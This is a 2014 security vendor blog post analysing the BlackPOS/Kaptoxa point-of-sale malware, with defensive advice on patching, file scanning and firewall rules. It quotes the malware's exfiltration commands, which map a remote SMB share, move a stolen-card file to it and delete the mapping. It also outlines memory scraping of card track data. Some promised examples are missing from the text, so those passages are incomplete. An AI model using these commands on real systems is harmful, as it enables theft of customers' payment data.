In the past year, we’ve heard about numerous major retailers getting hit by a series of different variants of malware designed to swipe their customers’ credit card information. Last week, I sat down with Anne Steiner and captured some of our thoughts on this matter. Today, I’m going to take that Q&A session we had down a level to where we discuss the technology that is causing this wave of cyber-theft.
To begin with, let’s discuss the attacks. In years past, you would typically hear about companies who leaked information from a central point. A great example is that hackers would try and infiltrate a network and then go after servers that they could tell housed critical databases that contained customer information. After taking control of that system, through whatever various means they used, they’d then use various mechanisms of exfiltration to take that data and send it offsite all in one fell swoop.
The challenge with these types of attacks is that cyber-security has advanced through the years to make this more difficult. IT Administrators first identify their “primary targets” on networks where data is stored. Then, they create various levels of security to prevent that data from being accessed from nodes that shouldn’t have access to it, while also putting IP-security around it to make sure that if the data was compromised it couldn’t freely flow off the server into the wrong hands. The quick gist, though, is it is increasingly difficult for hackers to find servers that are vulnerable and then exploit them without detection.
The challenge with the most recent wave of attacks is that the hacking community has realized that these attacks are difficult and once again the law of governing dynamics for cyber-warfare has taken over. That law specifically stating:
1) Attacks will trend towards the most vulnerable machines on a network.
2) Attacks will trend towards the most vulnerable software on a network.
3) Attacks will trend towards the most valuable data on a network.
In the above, this has forced a change in the way in which hackers go about exploiting vulnerabilities and how they get data off of a network.
Fast-forward to current day where cyber security is a challenge. We have already discussed that most of your server administrators are securing servers with Patch and various levels of anti-malware detection. The challenge is that the same security perimeter does not exist at most of the user endpoints on a network. In general, most of those endpoints don’t contain highly valuable data, unless you have specific knowledge of who you are hacking. In the retail sector though, you know that there are cash-register terminals (Point of Sale systems) out there that are handling the transactions with customers and these nodes get interesting. In general, they are Microsoft Windows nodes running Point of Sale Software and they are collecting credit-cards at a rate of over 97% of consumer transactions. This is where things get interesting for hackers.
Let me give you a non-technical description of the problem for a moment. Imagine I was a thief breaking into your home. I need to target you, but realistically, I don’t know who lives there and I just kind of brute force my way in. When I get inside, I start looking around for valuable stuff to steal. Maybe I see some good stuff, but for the really valuable stuff like jewelry, credit cards, money, or even electronics, I need to dig around a bit. It takes a while, right? In the case of retail, imagine the scenario is different… I want credit cards; I know they are generally at the point of sale systems, and I know where those are located in the store. I can get in, look for exactly what I want, and then get out.
This is the power of knowing your target and what you want to steal; you can get far more specific, and that’s what is fueling all of these attacks.
We’re going to take a step back for a moment and dissect a specific malware threat known as BlackPOS or Kaptoxa. This malware is specifically designed to run on Point of Sale systems, and it is further designed in a two-step process to steal the data without detection. We’ll talk about its approach and then how to protect yourself from it.
BASIC OPERATION OF KAPTOXA
First off, Kaptoxa has to make it onto your network. In general, the most direct approach for this to happen is an unsecure or unpatched machine, where hackers are able to gain access to your network with some sort of elevated privileges. After they get onto the network, they begin to spread Kaptoxa around via a number of freely available scripts on the internet that identify the Point-Of-Sale (POS) systems and then infect them.
After infection, Kaptoxa begins to operate with two different processes. The first process attaches itself to the POS application and begins to look for credit card information, and the latter process runs periodically and starts up to offload the captured information to external servers.
For the first process, Kaptoxa does something so simple and effective it’s scary. It grabs the POS execution process and just identifies its memory. During normal operation of the program, it’ll read some credit card information in from a credit card swipe reader. This data is in an incredibly uniform pattern that resembles something like this:
However, this is the problem! The data is so uniform, if I can attach myself to a process and look at its memory, at some point, a credit card track will be visible to me just by scanning the memory and looking for a pattern like that. While that sounds tough, a rough scrape of that information can easily be done in a simple grep command with a parameter that looks like this:
So, now that Kaptoxa knows what data it is looking for, where to find it, and how to extract it from memory, the last bit it’ll do is store it somewhere on the hard drive so it can pick it up later. In some of the early variants, it placed it right into the Windows System directory in a falsely named DLL file and just stored it in plain text.
With the main process running, Kaptoxa is constantly looking for more data to exploit and dropping it into a directory for it to be sent off later. That file will just continue to grow over time. The role of that second process is to wake up occasionally and extract the data offsite. The Kaptoxa process is again simplistic in it approach to date, using some basic mechanisms of internet file share mapping via SMB/CIFS to connect an internet drive on a remote server that is setup for open sharing, then it copies the file and removes the share. While the approach has been different by variant, the command syntax for execution will look something like:
net use L: \<[X.X.X.X]>c$WINDOWStwain_32 /user:<[User]> <[Password]>
move <Windows>system32winxml.dll S:<[Machine Name]><[Day]><[Month]><[Hour]>.txt
net use L: /del
The script above connects a drive mapping called “L:” to a remote server, moves the file and then deletes the file share after it is done. A quick execution of this process later and the file is gone and your data has been extracted.
PROTECTING / DETECTING IN YOUR ENVIRONMENT
First off, I’d be remised if I didn’t remind you that the malware compromised your network through a security flaw. If the systems had been protected, it wouldn’t have been compromised in the first place. The one thing to mention here is don’t just protect your servers, but your workstations need to be patched and managed too to prevent this. At the same time, if it already happened, you want to be prepared too.
In all the variants we’ve seen so far, there are two ways to protect yourself that target a specific aspect of the malware. Let’s start with the process/memory thread. In that case, the simplest way to make sure you aren’t vulnerable is to make sure you don’t have your data on your POS hard-drive or registry. There is a very simple way to take the regular expression that I listed above, and put it into a PowerShell script that scans your windows files and finds the same signature that Kaptoxa is looking for. If you find it on your hard-drive, I promise you, if you are PCI compliant, it shouldn’t be there. You’re infected and should take immediate measures to shut down the remote nodes while you do clean-up on the malware.
The second prevention method is more of a network approach, but barring specific reasons, there shouldn’t be a reason why one of your POS systems should be attaching a network drive to an off-company IP address. To put a hard stop on this, a brute-force deny rule can be added to your firewall alerts using the general alert format of:
To: External IP
If you are looking for a less-invasive rule, I’d suggest country filters for this SMB/CIFS traffic.
NOT JUST RETAIL – THE STRING AHEAD
So, let me just say this blog isn’t just for Retail. What started as swiping swipes is proliferating into variants that haven’t been successful yet but are beginning to come together to steal banking data, financial records, health insurance/patient information and other types of structured data. We can expect this threat to evolve rapidly in 2014/2015, and everyone should implement best practices to:
1) Prevent threats from getting on their network by protecting Servers AND WORKSTATIONS with patching and anti-malware technologies
2) Prevent data theft from implementing more specific rules on key areas and equipment on their network to prevent data exfiltration.
If you’d like to learn more about recent security breaches, what companies can do to defend their networks, and what consumers can do protect themselves, please join us for the following Shavlik webinar.
Security Breaches Everywhere – Help your company stay out of the headlines
Thursday, October 2, 2014 10:00 am CDT